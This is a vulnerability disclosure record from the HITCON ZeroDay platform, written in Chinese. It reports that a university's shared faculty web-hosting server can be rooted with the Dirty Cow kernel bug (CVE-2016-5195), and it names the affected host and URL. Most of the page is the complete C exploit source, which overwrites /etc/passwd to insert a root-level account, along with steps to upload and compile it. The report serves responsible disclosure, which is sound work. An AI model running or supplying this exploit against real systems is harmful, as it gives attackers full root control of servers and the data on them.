Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2019-00339
- Vendor: 臺北科技大學
- Title: 臺北科技大學 提權漏洞
- Introduction: 可以用 Dirty Cow 輕鬆提權,取得 root 權限。 https://dirtycow.ninja/
- 感謝函
處理狀態
目前狀態
公開
Last Update : 2019/06/18
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2019/04/18 20:30:06 : 新提交 (由 yaoandy107 更新此狀態)
- 2019/04/18 22:07:12 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/04/19 17:34:09 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/06/18 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2019-00339
- 通報者:yaoandy107 (yaoandy107)
- 風險:高
- 類型:權限提升 (Privilege Escalation)
參考資料
攻擊者可利用此漏洞提升帳號權限,如其他使用者甚至管理者權限。
漏洞說明: OWASP - Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
漏洞說明: OWASP - Testing for Privilege escalation (OTG-AUTHZ-003)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
漏洞說明: CWE - Privilege
https://cwe.mitre.org/data/definitions/901.html
漏洞說明: OWASP - Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
漏洞說明: OWASP - Testing for Privilege escalation (OTG-AUTHZ-003)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
漏洞說明: CWE - Privilege
https://cwe.mitre.org/data/definitions/901.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
學校提供教職員與學生架設網頁的空間,許多教授會將網站架設在上面。
使用教學網址:https://cnc.ntut.edu.tw/files/13-1008-2620.php?Lang=zh-tw
受影響主機:140.124.13.11
受影響網址:http://myweb.ntut.edu.tw/
使用教學網址:https://cnc.ntut.edu.tw/files/13-1008-2620.php?Lang=zh-tw
受影響主機:140.124.13.11
受影響網址:http://myweb.ntut.edu.tw/
敘述
漏洞
類型:提權
影響:可以控制整台 Server,內含許多老師的教學網站
CVE-2016-5195 Dirty Cow
可以將寫好攻擊程式傳上去並用 gcc 編譯,透過 dirty cow 漏洞,直接取得 root 權限。
攻擊程式碼
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo
{
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw)
{
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u)
{
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg)
{
int i, c = 0;
for (i = 0; i < 200000000; i++)
{
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to)
{
// check if target file already exists
if (access(to, F_OK) != -1)
{
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if (source == NULL)
{
return -1;
}
target = fopen(to, "w");
if (target == NULL)
{
fclose(source);
return -1;
}
while ((ch = fgetc(source)) != EOF)
{
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0)
{
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw = getpass("Please enter new password: ");
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n", (unsigned long)map);
pid = fork();
if (pid)
{
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l = strlen(complete_passwd_line);
for (i = 0; i < 10000 / l; i++)
{
for (o = 0; o < l; o++)
{
for (u = 0; u < 10000; u++)
{
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long *)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n", c);
}
else
{
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth, NULL);
}
printf("Done! Check %s to see if the new user was created\n", filename);
printf("You can log in with username %s and password %s.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
filename, backup_filename);
return 0;
}
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。